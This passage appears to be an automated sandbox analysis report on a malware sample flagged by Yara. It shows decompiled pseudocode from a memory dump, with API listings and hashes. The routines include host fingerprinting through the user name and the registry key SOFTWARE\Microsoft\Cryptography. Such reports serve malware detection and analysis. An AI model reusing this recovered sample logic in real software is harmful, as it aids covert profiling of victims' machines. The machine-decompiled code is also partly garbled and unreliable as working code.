                                                                                                                                                                                          							 *0x0041C634 = 0;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E004031DC();
                                                                                                                                                                                          						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                                                                                                                                                                                          							_t14 =  *0x0041C638;
                                                                                                                                                                                          							if( *0x0041C638 != 0) {
                                                                                                                                                                                          								E00404890(_t14);
                                                                                                                                                                                          								_t35 =  *((intOrPtr*)(0x41c638));
                                                                                                                                                                                          								_t7 = _t35 + 0x10; // 0x0
                                                                                                                                                                                          								_t24 =  *_t7;
                                                                                                                                                                                          								_t8 = _t35 + 4; // 0x400000
                                                                                                                                                                                          								if(_t24 !=  *_t8 && _t24 != 0) {
                                                                                                                                                                                          									FreeLibrary(_t24);
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E004031B4();
                                                                                                                                                                                          						if( *((char*)(0x41c650)) == 1) {
                                                                                                                                                                                          							 *0x0041C64C();
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if( *((char*)(0x41c650)) != 0) {
                                                                                                                                                                                          							E00403338();
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if( *0x41c628 == 0) {
                                                                                                                                                                                          							if( *0x41c018 != 0) {
                                                                                                                                                                                          								 *0x41c018();
                                                                                                                                                                                          							}
                                                                                                                                                                                          							ExitProcess( *0x41b000); // executed
                                                                                                                                                                                          						}
                                                                                                                                                                                          						memcpy(0x41c628,  *0x41c628, 0xb << 2);
                                                                                                                                                                                          						_t45 = _t45 + 0xc;
                                                                                                                                                                                          						0x41b000 = 0x41b000;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						 *0x41c030 = 0;
                                                                                                                                                                                          						 *((intOrPtr*)( *0x41c030))();
                                                                                                                                                                                          					} while ( *0x41c030 != 0);
                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}








                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                          • Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004033EC() {
                                                                                                                                                                                          				intOrPtr* _t13;
                                                                                                                                                                                          				struct HINSTANCE__* _t27;
                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                          
                                                                                                                                                                                          				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                                                                                                                                                                          				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                                                                                                                                                                                          					L5:
                                                                                                                                                                                          					if( *0x41b004 != 0) {
                                                                                                                                                                                          						E004032DC();
                                                                                                                                                                                          						E00403368(_t36);
                                                                                                                                                                                          						 *0x41b004 = 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L7:
                                                                                                                                                                                          					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                                                                                                                                                                                          						 *0x0041C634 = 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					E004031DC();
                                                                                                                                                                                          					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                                                                                                                                                                                          						_t17 =  *0x0041C638;
                                                                                                                                                                                          						if( *0x0041C638 != 0) {
                                                                                                                                                                                          							E00404890(_t17);
                                                                                                                                                                                          							_t39 =  *((intOrPtr*)(0x41c638));
                                                                                                                                                                                          							_t7 = _t39 + 0x10; // 0x0
                                                                                                                                                                                          							_t27 =  *_t7;
                                                                                                                                                                                          							_t8 = _t39 + 4; // 0x400000
                                                                                                                                                                                          							if(_t27 !=  *_t8 && _t27 != 0) {
                                                                                                                                                                                          								FreeLibrary(_t27);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					E004031B4();
                                                                                                                                                                                          					if( *((char*)(0x41c650)) == 1) {
                                                                                                                                                                                          						 *0x0041C64C();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if( *((char*)(0x41c650)) != 0) {
                                                                                                                                                                                          						E00403338();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if( *0x41c628 == 0) {
                                                                                                                                                                                          						if( *0x41c018 != 0) {
                                                                                                                                                                                          							 *0x41c018();
                                                                                                                                                                                          						}
                                                                                                                                                                                          						ExitProcess( *0x41b000); // executed
                                                                                                                                                                                          					}
                                                                                                                                                                                          					memcpy(0x41c628,  *0x41c628, 0xb << 2);
                                                                                                                                                                                          					_t52 = _t52 + 0xc;
                                                                                                                                                                                          					0x41b000 = 0x41b000;
                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						 *0x41c030 = 0;
                                                                                                                                                                                          						 *((intOrPtr*)( *0x41c030))();
                                                                                                                                                                                          					} while ( *0x41c030 != 0);
                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}









                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                          • Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004033F0() {
                                                                                                                                                                                          				struct HINSTANCE__* _t26;
                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                          
                                                                                                                                                                                          				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
                                                                                                                                                                                          					L4:
                                                                                                                                                                                          					if( *0x41b004 != 0) {
                                                                                                                                                                                          						E004032DC();
                                                                                                                                                                                          						E00403368(_t35);
                                                                                                                                                                                          						 *0x41b004 = 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L6:
                                                                                                                                                                                          					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
                                                                                                                                                                                          						 *0x0041C634 = 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					E004031DC();
                                                                                                                                                                                          					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
                                                                                                                                                                                          						_t16 =  *0x0041C638;
                                                                                                                                                                                          						if( *0x0041C638 != 0) {
                                                                                                                                                                                          							E00404890(_t16);
                                                                                                                                                                                          							_t38 =  *((intOrPtr*)(0x41c638));
                                                                                                                                                                                          							_t7 = _t38 + 0x10; // 0x0
                                                                                                                                                                                          							_t26 =  *_t7;
                                                                                                                                                                                          							_t8 = _t38 + 4; // 0x400000
                                                                                                                                                                                          							if(_t26 !=  *_t8 && _t26 != 0) {
                                                                                                                                                                                          								FreeLibrary(_t26);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					E004031B4();
                                                                                                                                                                                          					if( *((char*)(0x41c650)) == 1) {
                                                                                                                                                                                          						 *0x0041C64C();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if( *((char*)(0x41c650)) != 0) {
                                                                                                                                                                                          						E00403338();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					if( *0x41c628 == 0) {
                                                                                                                                                                                          						if( *0x41c018 != 0) {
                                                                                                                                                                                          							 *0x41c018();
                                                                                                                                                                                          						}
                                                                                                                                                                                          						ExitProcess( *0x41b000); // executed
                                                                                                                                                                                          					}
                                                                                                                                                                                          					memcpy(0x41c628,  *0x41c628, 0xb << 2);
                                                                                                                                                                                          					_t51 = _t51 + 0xc;
                                                                                                                                                                                          					0x41b000 = 0x41b000;
                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						 *0x41c030 = 0;
                                                                                                                                                                                          						 *((intOrPtr*)( *0x41c030))();
                                                                                                                                                                                          					} while ( *0x41c030 != 0);
                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}








                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                          • Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00406DA8(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				char _v536;
                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                          				void* _t56;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t18 = __eax - 0x55000000;
                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                          				_v8 = __edx;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				_push(_t56);
                                                                                                                                                                                          				_push(0x406e5f);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t56 + 0xfffffdec;
                                                                                                                                                                                          				_v20 = 0xfe;
                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                          				RegOpenKeyExW(_t18, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
                                                                                                                                                                                          				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                                                                                                                                                                                          				E00403D10(_a4, 0x100,  &_v536);
                                                                                                                                                                                          				_pop(_t52);
                                                                                                                                                                                          				 *[fs:eax] = _t52;
                                                                                                                                                                                          				_push(E00406E66);
                                                                                                                                                                                          				return E00403B98( &_v12, 2);
                                                                                                                                                                                          			}













                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 967375698-0
                                                                                                                                                                                          • Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                          • Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00406DAC(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                          				char _v536;
                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                          				void* _t55;
                                                                                                                                                                                          
                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                          				_v8 = __edx;
                                                                                                                                                                                          				_t44 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				E004040F4( &_v12);
                                                                                                                                                                                          				_push(_t55);
                                                                                                                                                                                          				_push(0x406e5f);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t55 + 0xfffffdec;
                                                                                                                                                                                          				_v20 = 0xfe;
                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                          				RegOpenKeyExW(_t44, E00403D3C(_v8), 0, 0x20119,  &_v24); // executed
                                                                                                                                                                                          				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
                                                                                                                                                                                          				E00403D10(_a4, 0x100,  &_v536);
                                                                                                                                                                                          				_pop(_t51);
                                                                                                                                                                                          				 *[fs:eax] = _t51;
                                                                                                                                                                                          				_push(E00406E66);
                                                                                                                                                                                          				return E00403B98( &_v12, 2);
                                                                                                                                                                                          			}












                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406E08
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocFreeOpenQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 967375698-0
                                                                                                                                                                                          • Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                          • Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401388(void* __eax, void** __edx) {
                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                          				void** _t8;
                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                          				long _t14;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t8 = __edx;
                                                                                                                                                                                          				if(__eax >= 0x100000) {
                                                                                                                                                                                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t14 = 0x100000;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t8[1] = _t14;
                                                                                                                                                                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                                                                                          				_t11 = _t3;
                                                                                                                                                                                          				 *_t8 = _t11;
                                                                                                                                                                                          				if(_t11 != 0) {
                                                                                                                                                                                          					_t3 = E0040123C(0x41c5d4, _t8);
                                                                                                                                                                                          					if(_t3 == 0) {
                                                                                                                                                                                          						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                                                                                          						 *_t8 = 0;
                                                                                                                                                                                          						return 0;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t3;
                                                                                                                                                                                          			}







                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                          • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                          • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                                                                                                          • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004065C4(intOrPtr* __eax) {
                                                                                                                                                                                          				short _v516;
                                                                                                                                                                                          				signed int _t4;
                                                                                                                                                                                          				signed int _t5;
                                                                                                                                                                                          				int _t9;
                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                          				DWORD* _t19;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t4 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t4 =  *_t4 + _t4;
                                                                                                                                                                                          				_t5 = _t4 | 0x5300000a;
                                                                                                                                                                                          				_t19 = _t18 + 0xfffffdfc;
                                                                                                                                                                                          				_t14 = _t5;
                                                                                                                                                                                          				 *_t19 = 0xff;
                                                                                                                                                                                          				_t9 = GetUserNameW( &_v516, _t19); // executed
                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                          					_t11 = E00403B80(_t14);
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t11 = E00403D10(_t14, 0x100,  &_v516);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                          			}











                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004065C8(signed int __eax) {
                                                                                                                                                                                          				short _v516;
                                                                                                                                                                                          				signed int _t4;
                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                          				DWORD* _t18;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t4 = __eax | 0x5300000a;
                                                                                                                                                                                          				_t18 = _t17 + 0xfffffdfc;
                                                                                                                                                                                          				_t13 = _t4;
                                                                                                                                                                                          				 *_t18 = 0xff;
                                                                                                                                                                                          				_t8 = GetUserNameW( &_v516, _t18); // executed
                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                          					_t10 = E00403B80(_t13);
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t10 = E00403D10(_t13, 0x100,  &_v516);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				return _t10;
                                                                                                                                                                                          			}











                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
                                                                                                                                                                                          				int _t4;
                                                                                                                                                                                          				int _t5;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t4 =  *0x41c5a8; // 0x3
                                                                                                                                                                                          				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
                                                                                                                                                                                          				return _t5;
                                                                                                                                                                                          			}






                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 626452242-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                          				intOrPtr* _v32;
                                                                                                                                                                                          				intOrPtr* _t24;
                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                          				intOrPtr* _t42;
                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                          				intOrPtr* _t45;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t45 =  &_v20;
                                                                                                                                                                                          				_v32 = __ecx;
                                                                                                                                                                                          				 *_t45 = __edx;
                                                                                                                                                                                          				_v28 = 0xffffffff;
                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                          				_t44 = __eax;
                                                                                                                                                                                          				_v20 =  *_t45 + __eax;
                                                                                                                                                                                          				_t35 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                          				while(_t35 != 0x41c5d4) {
                                                                                                                                                                                          					_t42 =  *_t35;
                                                                                                                                                                                          					_t5 = _t35 + 8; // 0x0
                                                                                                                                                                                          					_t43 =  *_t5;
                                                                                                                                                                                          					if(_t44 <= _t43) {
                                                                                                                                                                                          						_t6 = _t35 + 0xc; // 0x0
                                                                                                                                                                                          						if(_t43 +  *_t6 <= _v20) {
                                                                                                                                                                                          							if(_t43 < _v28) {
                                                                                                                                                                                          								_v28 = _t43;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t10 = _t35 + 0xc; // 0x0
                                                                                                                                                                                          							_t31 = _t43 +  *_t10;
                                                                                                                                                                                          							if(_t31 > _v24) {
                                                                                                                                                                                          								_v24 = _t31;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                                                                                                                                                                                          							if(_t32 == 0) {
                                                                                                                                                                                          								 *0x41c5b0 = 1;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							E0040126C(_t35);
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t35 = _t42;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t24 = _v32;
                                                                                                                                                                                          				 *_t24 = 0;
                                                                                                                                                                                          				if(_v24 == 0) {
                                                                                                                                                                                          					return _t24;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				 *_v32 = _v28;
                                                                                                                                                                                          				_t27 = _v24 - _v28;
                                                                                                                                                                                          				 *((intOrPtr*)(_v32 + 4)) = _t27;
                                                                                                                                                                                          				return _t27;
                                                                                                                                                                                          			}

















                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                          • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

